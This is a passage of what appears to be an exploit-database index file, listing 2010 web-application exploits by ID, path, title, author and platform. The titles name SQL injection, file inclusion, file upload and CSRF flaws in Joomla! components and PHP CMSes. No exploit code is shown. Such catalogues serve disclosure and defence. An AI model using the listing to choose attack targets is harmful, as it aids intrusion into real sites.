Bypass",2010-03-30,indoushka,webapps,php, +11978,exploits/php/webapps/11978.txt,"Joomla! Component DW Graph - Local File Inclusion",2010-03-31,"Chip d3 bi0s",webapps,php, +11979,exploits/php/webapps/11979.pl,"Centreon IT & Network Monitoring 2.1.5 - SQL Injection",2010-03-31,"Jonathan Salwan",webapps,php, +11980,exploits/php/webapps/11980.txt,"Easy-Clanpage 2.2 - Multiple SQL Injections /",2010-03-31,"Easy Laster",webapps,php, +11989,exploits/php/webapps/11989.txt,"Faweb_2 - Multiple Vulnerabilities",2010-03-30,indoushka,webapps,php, +11990,exploits/php/webapps/11990.txt,"Joomla! Component com_network - SQL Injection",2010-04-01,"DevilZ TM",webapps,php, +11991,exploits/php/webapps/11991.txt,"Joomla! Component com_tour - SQL Injection",2010-04-01,"DevilZ TM",webapps,php, +11992,exploits/php/webapps/11992.txt,"Joomla! Component com_trading - Blind SQL Injection",2010-04-01,"DevilZ TM",webapps,php, +11993,exploits/php/webapps/11993.txt,"Simply Sites RGV - Local File Inclusion",2010-04-01,"DevilZ TM",webapps,php, +11994,exploits/php/webapps/11994.txt,"DynPG CMS 4.1.0 - Multiple Vulnerabilities",2010-04-01,eidelweiss,webapps,php, +11995,exploits/php/webapps/11995.txt,"ALPHA CMS - Local File Inclusion",2010-04-01,eidelweiss,webapps,php, +11996,exploits/php/webapps/11996.txt,"Joomla! Component EContent - Local File Inclusion",2010-04-01,"Chip d3 bi0s",webapps,php, +11997,exploits/php/webapps/11997.txt,"Joomla! Component Jvehicles - Local File Inclusion",2010-04-01,"Chip d3 bi0s",webapps,php, +11998,exploits/php/webapps/11998.txt,"Joomla! Component User Status - Local File Inclusion",2010-04-01,"Chip d3 bi0s",webapps,php, +11999,exploits/php/webapps/11999.txt,"Joomla! Component webERPcustomer - Local File Inclusion",2010-04-01,"Chip d3 bi0s",webapps,php, +12002,exploits/php/webapps/12002.txt,"MusicBox 3.3 - Arbitrary File Upload",2010-04-01,indoushka,webapps,php, +12003,exploits/php/webapps/12003.txt,"onepound Shop / CMS - Cross-Site Scripting / SQL Injection",2010-04-01,Valentin,webapps,php, +12004,exploits/php/webapps/12004.txt,"PHP Jokesite 2.0 - exec Command",2010-04-01,indoushka,webapps,php, +12005,exploits/php/webapps/12005.txt,"Profi Einzelgebots Auktions System - Blind SQL Injection",2010-04-01,"Easy Laster",webapps,php, +12006,exploits/php/webapps/12006.txt,"Simple Calculator by Peter Rekdal Sunde - Arbitrary File Upload",2010-04-01,indoushka,webapps,php, +12007,exploits/php/webapps/12007.txt,"SimpNews 2.16.2 - Multiple SQL Injections",2010-04-01,NoGe,webapps,php, +12009,exploits/php/webapps/12009.html,"CMS Made Simple 1.7 - Cross-Site Request Forgery",2010-04-02,"pratul agrawal",webapps,php, +12015,exploits/php/webapps/12015.txt,"Joomla! Component com_menu - SQL Injection",2010-04-02,"DevilZ TM",webapps,php, +12016,exploits/php/webapps/12016.txt,"Joomla! Component com_ops - SQL Injection",2010-04-02,"DevilZ TM",webapps,php, +12017,exploits/php/webapps/12017.txt,"Joomla! Component com_football - SQL Injection",2010-04-02,"DevilZ TM",webapps,php, +12018,exploits/php/webapps/12018.txt,"DynPG CMS 4.1.0 - 'popup.php' / 'counter.php' Multiple Vulnerabilities",2010-04-02,eidelweiss,webapps,php, +12019,exploits/php/webapps/12019.txt,"Velhost Uploader Script 1.2 - Local File Inclusion",2010-04-02,cr4wl3r,webapps,php, +12021,exploits/php/webapps/12021.txt,"68kb 68KB Base 1.0.0rc3 - Cross-Site Request Forgery (Admin)",2010-04-02,"Jelmer de Hen",webapps,php, +12022,exploits/php/webapps/12022.txt,"68KB Knowledge Base 1.0.0rc3 - Cross-Site Request Forgery (Edit Main Settings)",2010-04-02,"Jelmer de Hen",webapps,php, +12026,exploits/php/webapps/12026.txt,"phpscripte24 Vor und Rückwärts Auktions System - Blind SQL Injection",2010-04-03,"Easy Laster",webapps,php, +12028,exploits/php/webapps/12028.txt,"PHP-fusion dsmsf Mod Downloads - SQL Injection",2010-04-03,Inj3ct0r,webapps,php, +12029,exploits/asp/webapps/12029.txt,"SafeSHOP 1.5.6 - Cross-Site Scripting / Multiple Cross-Site Request Forgery Vulnerabilities",2010-04-03,cp77fk4r,webapps,asp, +12031,exploits/php/webapps/12031.html,"Advanced Management For Services Sites - Remote Add Admin",2010-04-03,alnjm33,webapps,php, +12034,exploits/php/webapps/12034.txt,"Flatpress 0.909.1 - Persistent Cross-Site Scripting",2010-04-03,ITSecTeam,webapps,php, +12036,exploits/hardware/webapps/12036.txt,"Edimax AR-7084GA Router - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2010-04-03,l3D,webapps,hardware, +12037,exploits/php/webapps/12037.txt,"Joomla! Component JP Jobs 1.4.1 - SQL Injection",2010-04-03,Valentin,webapps,php, +12038,exploits/php/webapps/12038.txt,"Advanced Management For Services Sites - Bypass Create And Download SQL Backup",2010-04-04,indoushka,webapps,php, +12039,exploits/multiple/webapps/12039.txt,"QuickEStore 6.1 - Backup Dump",2010-04-04,indoushka,webapps,multiple, +12041,exploits/php/webapps/12041.txt,"Solutive CMS - SQL Injection",2010-04-04,"Th3 RDX",webapps,php, +12042,exploits/php/webapps/12042.txt,"x10 mirco blogging 121 - SQL Injection",2010-04-04,ITSecTeam,webapps,php, +12043,exploits/php/webapps/12043.html,"Prediction League 0.3.8 - Cross-Site Request Forgery (Add Admin)",2010-04-04,indoushka,webapps,php, +12045,exploits/php/webapps/12045.html,"MunkyScripts Simple Gallery - SQL Injection",2010-04-04,ITSecTeam,webapps,php, +12047,exploits/php/webapps/12047.html,"nodesforum 1.033 - Remote File Inclusion",2010-04-04,ITSecTeam,webapps,php, +12048,exploits/php/webapps/12048.html,"ttCMS 5.0 - Remote File Inclusion",2010-04-04,ITSecTeam,webapps,php, +12049,exploits/php/webapps/12049.html,"Uiga Proxy - Remote File Inclusion",2010-04-04,ITSecTeam,webapps,php, +12050,exploits/php/webapps/12050.txt,"MassMirror Uploader - Multiple Remote File Inclusions",2010-04-04,cr4wl3r,webapps,php, +12052,exploits/php/webapps/12052.txt,"SAGU-PRO 1.0 - Multiple Remote File Inclusions",2010-04-04,mat,webapps,php, +12054,exploits/php/webapps/12054.txt,"Joomla! Component redSHOP 1.0 - Local File Inclusion",2010-04-04,NoGe,webapps,php, +12055,exploits/php/webapps/12055.txt,"Joomla! Component redTWITTER 1.0 - Local File Inclusion",2010-04-04,NoGe,webapps,php, +12056,exploits/php/webapps/12056.txt,"Joomla! Component com_wisroyq 1.1 - Local File Inclusion",2010-04-04,NoGe,webapps,php, +12057,exploits/php/webapps/12057.txt,"Joomla! Component com_press - SQL Injection",2010-04-04,"DevilZ TM",webapps,php, +12058,exploits/php/webapps/12058.txt,"Joomla! Component Picasa 2.0 - Local File Inclusion",2010-04-04,Vrs-hCk,webapps,php, +12060,exploits/php/webapps/12060.txt,"Joomla! Component com_serie - SQL Injection",2010-04-04,"DevilZ TM",webapps,php, +12061,exploits/php/webapps/12061.txt,"Facil-CMS 0.1RC2 - Local/Remote File Inclusion",2010-04-04,eidelweiss,webapps,php, +12062,exploits/php/webapps/12062.txt,"Joomla! Component com_ranking - SQL Injection",2010-04-04,"DevilZ TM",webapps,php, +12065,exploits/php/webapps/12065.txt,"Joomla! Component JInventory 1.23.02 - Local File Inclusion",2010-04-05,"Chip d3 bi0s",webapps,php, +12066,exploits/php/webapps/12066.txt,"Joomla! Component SVMap 1.1.1 - Local File Inclusion",2010-04-05,Vrs-hCk,webapps,php, +12067,exploits/php/webapps/12067.txt,"Joomla! Component Shoutbox Pro - Local File Inclusion",2010-04-05,Vrs-hCk,webapps,php, +12068,exploits/php/webapps/12068.txt,"Joomla! Component LoginBox - Local File Inclusion",2010-04-05,Vrs-hCk,webapps,php, +12069,exploits/php/webapps/12069.txt,"Joomla! Component com_bca-rss-syndicator - Local File Inclusion",2010-04-05,Vrs-hCk,webapps,php, +12070,exploits/php/webapps/12070.txt,"Joomla! Component Magic Updater - Local File Inclusion",2010-04-05,Vrs-hCk,webapps,php, +12071,exploits/php/webapps/12071.txt,"jevoncms - Local/Remote File Inclusion",2010-04-05,eidelweiss,webapps,php, +12075,exploits/php/webapps/12075.txt,"LionWiki 3.x - 'index.php' Arbitrary File Upload",2010-04-05,ayastar,webapps,php, +12076,exploits/php/webapps/12076.pl,"ilchClan 1.0.5 - 'cid' SQL Injection",2010-04-05,"Easy Laster",webapps,php, +12077,exploits/php/webapps/12077.txt,"Joomla! Component News Portal 1.5.x - Local File Inclusion",2010-04-06,AntiSecurity,webapps,php, +12078,exploits/php/webapps/12078.txt,"Joomla! Component Freestyle FAQ Lite 1.3 - 'faqid' SQL Injection",2010-04-06,"Chip d3 bi0s",webapps,php, +12082,exploits/php/webapps/12082.txt,"Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion",2010-04-06,AntiSecurity,webapps,php, +12083,exploits/php/webapps/12083.txt,"Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion",2010-04-06,AntiSecurity,webapps,php, +12084,exploits/php/webapps/12084.txt,"Joomla! Component Juke Box 1.7 - Local File Inclusion",2010-04-06,AntiSecurity,webapps,php, +12085,exploits/php/webapps/12085.txt,"Joomla! Component Joomla Flickr 1.0 - Local File Inclusion",2010-04-06,AntiSecurity,webapps,php, +12086,exploits/php/webapps/12086.txt,"Joomla! Component Highslide 1.5 - Local File Inclusion",2010-04-06,AntiSecurity,webapps,php, +12087,exploits/php/webapps/12087.txt,"Joomla! Component Fabrik 2.0 - Local File Inclusion",2010-04-06,AntiSecurity,webapps,php, +12088,exploits/php/webapps/12088.txt,"Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion",2010-04-06,AntiSecurity,webapps,php, +12089,exploits/php/webapps/12089.txt,"Joomla! Component Appointment 1.5 - Local File Inclusion",2010-04-06,AntiSecurity,webapps,php, +12092,exploits/hardware/webapps/12092.txt,"McAfee Email Gateway (formerly IronMail) - Cross-Site Scripting",2010-04-06,"Nahuel Grisolia",webapps,hardware, +12094,exploits/php/webapps/12094.txt,"ShopSystem - SQL Injection",2010-04-06,Valentin,webapps,php, +12097,exploits/php/webapps/12097.txt,"Joomla! Component XOBBIX 1.0 - 'prodid' SQL Injection",2010-04-06,AntiSecurity,webapps,php, +12098,exploits/php/webapps/12098.txt,"WordPress Plugin NextGEN Gallery 1.5.1 - Cross-Site Scripting",2010-04-06,"Alejandro Rodriguez",webapps,php, +12100,exploits/asp/webapps/12100.txt,"Espinas CMS - SQL Injection",2010-04-07,"Pouya Daneshmand",webapps,asp, +12101,exploits/php/webapps/12101.txt,"Joomla! Component aWiki - Local File Inclusion",2010-04-07,"Angela Zhang",webapps,php, +12102,exploits/php/webapps/12102.txt,"Joomla! Component VJDEO 1.0 - Local File Inclusion",2010-04-07,"Angela Zhang",webapps,php, +12105,exploits/php/webapps/12105.txt,"Free Image & File Hosting - Arbitrary File Upload",2010-04-07,indoushka,webapps,php, +12106,exploits/php/webapps/12106.txt,"Istgah for Centerhost - Multiple Vulnerabilities",2010-04-07,indoushka,webapps,php, +12107,exploits/php/webapps/12107.txt,"Plume CMS 1.2.4 - Multiple Local File Inclusions",2010-04-07,eidelweiss,webapps,php, +12108,exploits/php/webapps/12108.txt,"Joomla! Component com_articles - SQL Injection",2010-04-08,"pratul agrawal",webapps,php, +12111,exploits/php/webapps/12111.txt,"Joomla! Component com_webeecomment 2.0 - Local File Inclusion",2010-04-08,AntiSecurity,webapps,php, +12112,exploits/php/webapps/12112.txt,"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion (1)",2010-04-08,AntiSecurity,webapps,php, +12113,exploits/php/webapps/12113.txt,"Joomla! Component AWDwall 1.5.4 - Local File Inclusion / SQL Injection",2010-04-08,AntiSecurity,webapps,php, +12115,exploits/php/webapps/12115.txt,"Kubeit CMS - SQL Injection",2010-04-08,Phenom,webapps,php, +12118,exploits/php/webapps/12118.txt,"Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion",2010-04-09,AntiSecurity,webapps,php, +12120,exploits/php/webapps/12120.txt,"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion",2010-04-09,"Chip d3 bi0s",webapps,php, +12121,exploits/php/webapps/12121.txt,"Joomla! Component JA Voice 2.0 - Local File Inclusion",2010-04-09,kaMtiEz,webapps,php, +12123,exploits/php/webapps/12123.txt,"Joomla! Component com_pcchess - Local File Inclusion",2010-04-09,team_elite,webapps,php, +12124,exploits/php/webapps/12124.txt,"Joomla! Component Huru Helpdesk - SQL Injection (1)",2010-04-09,bumble_be,webapps,php, +12128,exploits/php/webapps/12128.txt,"GarageSales - Arbitrary File Upload",2010-04-09,saidinh0,webapps,php, +12132,exploits/php/webapps/12132.pl,"Joomla! Component Agenda Address Book 1.0.1 - 'id' SQL Injection",2010-04-09,v3n0m,webapps,php, +12133,exploits/multiple/webapps/12133.txt,"Asset Manager 1.0 - Arbitrary File Upload",2010-04-09,"Shichemt Alen & NeT_Own3r",webapps,multiple, +12134,exploits/php/webapps/12134.txt,"MMHAQ CMS - SQL Injection",2010-04-10,s1ayer,webapps,php, +12135,exploits/php/webapps/12135.txt,"mygamingladder MGL Combo System 7.5 - SQL Injection",2010-04-10,"Easy Laster",webapps,php, +12136,exploits/php/webapps/12136.txt,"Joomla! Component Real Estate Property 3.1.22-03 - 'aid' SQL Injection",2010-04-10,c4uR,webapps,php, +12137,exploits/php/webapps/12137.txt,"Joomla! Component allvideos - Blind SQL Injection",2010-04-10,bumble_be,webapps,php, +12138,exploits/php/webapps/12138.txt,"Joomla! Component com_ca - SQL Injection",2010-04-10,DigitALL,webapps,php, +12139,exploits/php/webapps/12139.txt,"Kiasabz Article News CMS Magazine - SQL Injection",2010-04-10,indoushka,webapps,php, +12140,exploits/php/webapps/12140.php,"xBtiTracker - SQL Injection",2010-04-11,InATeam,webapps,php, +12141,exploits/php/webapps/12141.txt,"MediaInSpot CMS - Local File Inclusion (1)",2010-04-11,"Amoo Arash",webapps,php, +12142,exploits/php/webapps/12142.txt,"Joomla! Component TweetLA 1.0.1 - Local File Inclusion",2010-04-11,AntiSecurity,webapps,php, +12143,exploits/php/webapps/12143.txt,"Joomla! Component com_ticketbook - Local File Inclusion",2010-04-11,AntiSecurity,webapps,php, +12144,exploits/php/webapps/12144.txt,"Joomla! Component com_jajobboard - Multiple Local File Inclusions",2010-04-11,AntiSecurity,webapps,php, +12145,exploits/php/webapps/12145.txt,"Joomla! Component Jfeedback 1.2 - Local File Inclusion",2010-04-11,AntiSecurity,webapps,php, +12146,exploits/php/webapps/12146.txt,"Joomla! Component JProject Manager 1.0 - Local File Inclusion",2010-04-11,AntiSecurity,webapps,php, +12147,exploits/php/webapps/12147.txt,"Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion",2010-04-11,AntiSecurity,webapps,php, +12148,exploits/php/webapps/12148.txt,"Joomla! Component RokModule 1.1 - 'moduleid' Blind SQL Injection",2010-04-11,AntiSecurity,webapps,php, +12149,exploits/php/webapps/12149.txt,"Joomla! Component com_spsnewsletter - Local File Inclusion",2010-04-11,AntiSecurity,webapps,php, +12150,exploits/php/webapps/12150.txt,"Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion",2010-04-11,AntiSecurity,webapps,php, +12151,exploits/php/webapps/12151.txt,"Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion",2010-04-11,AntiSecurity,webapps,php, +12153,exploits/php/webapps/12153.txt,"Joomla! Component education - SQL Injection",2010-04-11,bumble_be,webapps,php, +12155,exploits/php/webapps/12155.txt,"AuroraGPT 4.0 - Remote Code Execution",2010-04-11,"Amoo Arash",webapps,php, +12157,exploits/php/webapps/12157.txt,"OnePC mySite Management Software - SQL Injection",2010-04-11,Valentin,webapps,php, +12158,exploits/php/webapps/12158.py,"Elite Gaming Ladders 3.5 - 'match' SQL Injection",2010-04-11,"Easy Laster",webapps,php, +12159,exploits/php/webapps/12159.txt,"Joomla! Component Multi-Venue Restaurant Menu Manager 1.5.2 - SQL Injection",2010-04-11,Valentin,webapps,php, +12160,exploits/php/webapps/12160.txt,"HotNews 0.7.2 - Remote File Inclusion",2010-04-11,team_elite,webapps,php, +12162,exploits/php/webapps/12162.txt,"Joomla! Component mv_restaurantmenumanager - SQL Injection",2010-04-11,Sudden_death,webapps,php, +12163,exploits/php/webapps/12163.txt,"Worldviewer.com CMS - SQL Injection",2010-04-12,"41.w4r10r aka AN1L",webapps,php, +12164,exploits/php/webapps/12164.txt,"YaPiG 0.94.0u - Remote File Inclusion",2010-04-12,JIKO,webapps,php, +12166,exploits/php/webapps/12166.txt,"Joomla! Component Web TV 1.0 - Local File Inclusion",2010-04-12,AntiSecurity,webapps,php, +12167,exploits/php/webapps/12167.txt,"Joomla! Component Horoscope 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,webapps,php, +12168,exploits/php/webapps/12168.txt,"Joomla! Component Arcade Games 1.0 - Local File Inclusion",2010-04-12,AntiSecurity,webapps,php, +12169,exploits/php/webapps/12169.txt,"Joomla! Component FlashGames 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,webapps,php, +12170,exploits/php/webapps/12170.txt,"Joomla! Component Address Book 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,webapps,php, +12171,exploits/php/webapps/12171.txt,"Joomla! Component Advertising 0.25 - Local File Inclusion",2010-04-12,AntiSecurity,webapps,php, +12172,exploits/php/webapps/12172.txt,"Joomla! Component CV Maker 1.0 - Local File Inclusion",2010-04-12,AntiSecurity,webapps,php, +12173,exploits/php/webapps/12173.txt,"Joomla! Component My Files 1.0 - Local File Inclusion",2010-04-12,AntiSecurity,webapps,php, +12174,exploits/php/webapps/12174.txt,"Joomla! Component Online Exam 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,webapps,php, +12175,exploits/php/webapps/12175.txt,"Joomla! Component JoomMail 1.0 - Local File Inclusion",2010-04-12,AntiSecurity,webapps,php, +12176,exploits/php/webapps/12176.txt,"Joomla! Component Memory Book 1.2 - Local File Inclusion",2010-04-12,AntiSecurity,webapps,php, +12177,exploits/php/webapps/12177.txt,"Joomla! Component Online Market 2.x - Local File Inclusion",2010-04-12,AntiSecurity,webapps,php, +12178,exploits/php/webapps/12178.txt,"Joomla! Component Digital Diary 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,webapps,php, +12179,exploits/php/webapps/12179.txt,"FusionForge 5.0 - Multiple Remote File Inclusions",2010-04-12,cr4wl3r,webapps,php, +12180,exploits/php/webapps/12180.txt,"Joomla! Component com_worldrates - Local File Inclusion",2010-04-12,AntiSecurity,webapps,php, +12181,exploits/php/webapps/12181.txt,"Joomla! Component com_record - Local File Inclusion",2010-04-12,AntiSecurity,webapps,php, +12182,exploits/php/webapps/12182.txt,"Joomla! Component Sweetykeeper 1.5 - Local File Inclusion",2010-04-12,AntiSecurity,webapps,php, +12183,exploits/php/webapps/12183.txt,"Joomla! Component com_jdrugstopics - SQL Injection",2010-04-12,SadHaCkEr,webapps,php, +12184,exploits/php/webapps/12184.txt,"Joomla! Component SermonSpeaker - SQL Injection",2010-04-12,SadHaCkEr,webapps,php, +12185,exploits/php/webapps/12185.txt,"Joomla! Component FLEXIcontent 1.5 - Local File Inclusion",2010-04-12,eidelweiss,webapps,php, +12187,exploits/php/webapps/12187.txt,"Vieassociative Openmairie 1.01 Beta - Local File Inclusion / Remote File Inclusion",2010-04-12,cr4wl3r,webapps,php, +12190,exploits/php/webapps/12190.txt,"Joomla! Component Jvehicles 1.0/2.0 - 'aid' SQL Injection",2010-04-13,"Don Tukulesto",webapps,php, +12191,exploits/php/webapps/12191.txt,"Joomla! Component JP Jobs 1.2.0 - 'id' SQL Injection",2010-04-13,v3n0m,webapps,php, +12192,exploits/php/webapps/12192.txt,"Blog System 1.5 - Multiple Vulnerabilities",2010-04-13,cp77fk4r,webapps,php, +12193,exploits/php/webapps/12193.txt,"Openurgence vaccin 1.03 - Local File Inclusion / Remote File Inclusion",2010-04-13,cr4wl3r,webapps,php, +12194,exploits/php/webapps/12194.txt,"Police Municipale Open Main Courante 1.01beta - Local File Inclusion / Remote File Inclusion",2010-04-13,cr4wl3r,webapps,php, +12195,exploits/php/webapps/12195.rb,"joelz bulletin board 0.9.9rc3 - Multiple SQL Injections",2010-04-13,"Easy Laster",webapps,php, +12197,exploits/asp/webapps/12197.txt,"Mp3 MuZik - Database Disclosure",2010-04-13,indoushka,webapps,asp, +12198,exploits/php/webapps/12198.txt,"Games Script - 'Galore' Backup Dump",2010-04-13,indoushka,webapps,php, +12199,exploits/asp/webapps/12199.txt,"My School Script - Database Disclosure",2010-04-13,indoushka,webapps,asp, +12200,exploits/php/webapps/12200.txt,"Joomla! Component QPersonel 1.0.2 - SQL Injection",2010-04-13,Valentin,webapps,php, +12212,exploits/php/webapps/12212.txt,"Opentel Openmairie tel 1.02 - Local File Inclusion",2010-04-14,cr4wl3r,webapps,php, +12218,exploits/asp/webapps/12218.txt,"School Management System Pro 6.0.0 - Backup Dump",2010-04-14,indoushka,webapps,asp, +12219,exploits/php/webapps/12219.txt,"Mp3 Online Id Tag Editor - Remote File Inclusion",2010-04-14,indoushka,webapps,php, +12220,exploits/php/webapps/12220.txt,"Almnzm 2.1 - SQL Injection",2010-04-14,"NeX HaCkEr",webapps,php, +12221,exploits/php/webapps/12221.rb,"Bild Flirt System 1.0 - SQL Injection",2010-04-14,"Easy Laster",webapps,php, +12222,exploits/php/webapps/12222.txt,"PhpMesFilms 1.8 - SQL Injection",2010-04-14,indoushka,webapps,php, +12223,exploits/php/webapps/12223.txt,"Multi-Mirror - Arbitrary File Upload",2010-04-14,indoushka,webapps,php, +12224,exploits/php/webapps/12224.txt,"Mihalism Multi Host 4.0.0 - Arbitrary File Upload",2010-04-14,indoushka,webapps,php, +12226,exploits/php/webapps/12226.txt,"Magic Uploader Mini - Arbitrary File Upload",2010-04-14,indoushka,webapps,php, +12227,exploits/php/webapps/12227.txt,"YUI Images Script - Arbitrary File Upload",2010-04-14,Mr.P3rfekT,webapps,php, +12230,exploits/php/webapps/12230.txt,"Joomla! Component com_wgpicasa - Local File Inclusion",2010-04-14,AntiSecurity,webapps,php, +12231,exploits/php/webapps/12231.txt,"Joomla! Component com_s5clanroster - Local File Inclusion",2010-04-14,AntiSecurity,webapps,php, +12232,exploits/php/webapps/12232.txt,"Joomla! Component Photo Battle 1.0.1 - Local File Inclusion",2010-04-14,AntiSecurity,webapps,php, +12233,exploits/php/webapps/12233.txt,"Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion",2010-04-14,AntiSecurity,webapps,php, +12234,exploits/php/webapps/12234.txt,"Joomla! Component Media Mall Factory 1.0.4 - Blind SQL Injection",2010-04-14,AntiSecurity,webapps,php, +12235,exploits/php/webapps/12235.txt,"Joomla! Component Love Factory 1.3.4 - Local File Inclusion",2010-04-14,AntiSecurity,webapps,php, +12236,exploits/php/webapps/12236.txt,"Joomla! Component JA Comment - Local File Inclusion",2010-04-14,AntiSecurity,webapps,php, +12237,exploits/php/webapps/12237.txt,"Joomla! Component Delicious Bookmarks 0.0.1 - Local File Inclusion",2010-04-14,AntiSecurity,webapps,php, +12238,exploits/php/webapps/12238.txt,"Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion",2010-04-14,AntiSecurity,webapps,php, +12239,exploits/php/webapps/12239.txt,"Joomla! Component BeeHeard 1.0 - Local File Inclusion",2010-04-14,AntiSecurity,webapps,php, +12241,exploits/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities",2010-04-14,eidelweiss,webapps,php, +12242,exploits/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System - Multiple SQL Injections",2010-04-14,wsn1983,webapps,jsp, +12245,exploits/php/webapps/12245.txt,"Softbiz B2B trading Marketplace Script - buyers_subcategories SQL Injection",2010-04-15,"AnGrY BoY",webapps,php, +12246,exploits/php/webapps/12246.txt,"Joomla! Component Intellectual Property 1.5.3 - 'id' SQL Injection",2010-04-15,v3n0m,webapps,php, +12249,exploits/php/webapps/12249.txt,"60cycleCMS 2.5.2 - 'DOCUMENT_ROOT' Multiple Local File Inclusions",2010-04-15,eidelweiss,webapps,php, +12251,exploits/php/webapps/12251.php,"Camiro-CMS_beta-0.1 - 'FCKeditor' Arbitrary File Upload",2010-04-15,eidelweiss,webapps,php, +12254,exploits/php/webapps/12254.txt,"FCKEditor Core - 'FileManager test.html' Arbitrary File Upload (1)",2010-04-16,Mr.MLL,webapps,php, +12256,exploits/php/webapps/12256.txt,"ilchClan 1.0.5B - SQL Injection",2010-04-16,"Easy Laster",webapps,php, +12257,exploits/php/webapps/12257.txt,"Joomla! Component com_manager 1.5.3 - 'id' SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",webapps,php, +12260,exploits/php/webapps/12260.txt,"SIESTTA 2.0 - Local File Inclusion / Cross-Site Scripting",2010-04-16,JosS,webapps,php, +12262,exploits/php/webapps/12262.php,"Zyke CMS 1.1 - Authentication Bypass",2010-04-16,"Giuseppe 'giudinvx' D'Inverno",webapps,php, +12266,exploits/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change Username and Password)",2010-04-16,EL-KAHINA,webapps,php, +12267,exploits/php/webapps/12267.txt,"WebAdmin - Arbitrary File Upload",2010-04-16,DigitALL,webapps,php, +12268,exploits/php/webapps/12268.txt,"Uploader 0.7 - Arbitrary File Upload",2010-04-16,DigitALL,webapps,php, +12269,exploits/php/webapps/12269.txt,"Joomla! Component JoltCard 1.2.1 - SQL Injection",2010-04-16,Valentin,webapps,php, +12270,exploits/php/webapps/12270.txt,"Joomla! Component com_pandafminigames - SQL Injection",2010-04-16,Valentin,webapps,php, +12272,exploits/php/webapps/12272.txt,"PHP RapidKill Pro 5.x - Arbitrary File Upload",2010-04-17,DigitALL,webapps,php, +12276,exploits/php/webapps/12276.txt,"Redaxo 4.2.1 - Remote File Inclusion",2010-04-18,eidelweiss,webapps,php, +12277,exploits/php/webapps/12277.txt,"Openscrutin 1.03 - Local File Inclusion / Remote File Inclusion",2010-04-18,cr4wl3r,webapps,php, +12278,exploits/php/webapps/12278.txt,"Alegro 1.2.1 - SQL Injection",2010-04-18,indoushka,webapps,php, +12279,exploits/php/webapps/12279.txt,"eclime 1.1 - Bypass / Create and Download Backup",2010-04-18,indoushka,webapps,php, +12280,exploits/php/webapps/12280.txt,"dl_stats - Multiple Vulnerabilities",2010-04-18,"Valentin Hoebel",webapps,php, +12282,exploits/php/webapps/12282.txt,"Joomla! Component Archery Scores 1.0.6 - Local File Inclusion",2010-04-18,"wishnusakti + inc0mp13te",webapps,php, +12283,exploits/php/webapps/12283.txt,"Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion",2010-04-18,AntiSecurity,webapps,php, +12284,exploits/php/webapps/12284.txt,"Joomla! Component ZiMBCore 0.1 - Local File Inclusion",2010-04-18,AntiSecurity,webapps,php, +12285,exploits/php/webapps/12285.txt,"Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion",2010-04-18,AntiSecurity,webapps,php, +12286,exploits/php/webapps/12286.txt,"Joomla! Component Matamko 1.01 - Local File Inclusion",2010-04-18,AntiSecurity,webapps,php, +12287,exploits/php/webapps/12287.txt,"Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion",2010-04-18,AntiSecurity,webapps,php, +12288,exploits/php/webapps/12288.txt,"Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion",2010-04-18,AntiSecurity,webapps,php, +12289,exploits/php/webapps/12289.txt,"Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion",2010-04-18,AntiSecurity,webapps,php, +12290,exploits/php/webapps/12290.txt,"Joomla! Component com_google - Local File Inclusion",2010-04-18,AntiSecurity,webapps,php, +12291,exploits/php/webapps/12291.txt,"Joomla! Component iF surfALERT 1.2 - Local File Inclusion",2010-04-18,AntiSecurity,webapps,php, +12292,exploits/php/webapps/12292.txt,"Flex File Manager - Arbitrary File Upload",2010-04-19,Mr.MLL,webapps,php, +12295,exploits/php/webapps/12295.txt,"N/X Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities",2010-04-19,eidelweiss,webapps,php, +12296,exploits/php/webapps/12296.txt,"Openreglement 1.04 - Local File Inclusion / Remote File Inclusion",2010-04-19,cr4wl3r,webapps,php, +12299,exploits/php/webapps/12299.txt,"Joomla! Component GBU Facebook 1.0.5 - SQL Injection",2010-04-19,kaMtiEz,webapps,php, +12301,exploits/php/webapps/12301.txt,"CMS Ariadna 2009 - SQL Injection",2010-04-19,"Andrés Gómez",webapps,php, +12303,exploits/php/webapps/12303.pl,"MusicBox 3.3 - SQL Injection",2010-04-20,Ctacok,webapps,php, +12305,exploits/php/webapps/12305.txt,"Joomla! Component Online News Paper Manager 1.0 - 'cid' SQL Injection",2010-04-20,"Don Tukulesto",webapps,php, +12306,exploits/php/webapps/12306.txt,"Joomla! Component JTM Reseller 1.9 Beta - SQL Injection",2010-04-20,kaMtiEz,webapps,php, +12313,exploits/php/webapps/12313.txt,"Openregistrecil 1.02 - Local File Inclusion / Remote File Inclusion",2010-04-20,cr4wl3r,webapps,php, +12315,exploits/php/webapps/12315.txt,"v2marketplacescript Upload_images Script (-7777) - Arbitrary File Upload",2010-04-21,cyberlog,webapps,php, +12316,exploits/php/webapps/12316.txt,"Joomla! Component WMI 1.5.0 - Local File Inclusion",2010-04-21,"wishnusakti + inc0mp13te",webapps,php, +12317,exploits/php/webapps/12317.txt,"Joomla! Component OrgChart 1.0.0 - Local File Inclusion",2010-04-21,AntiSecurity,webapps,php, 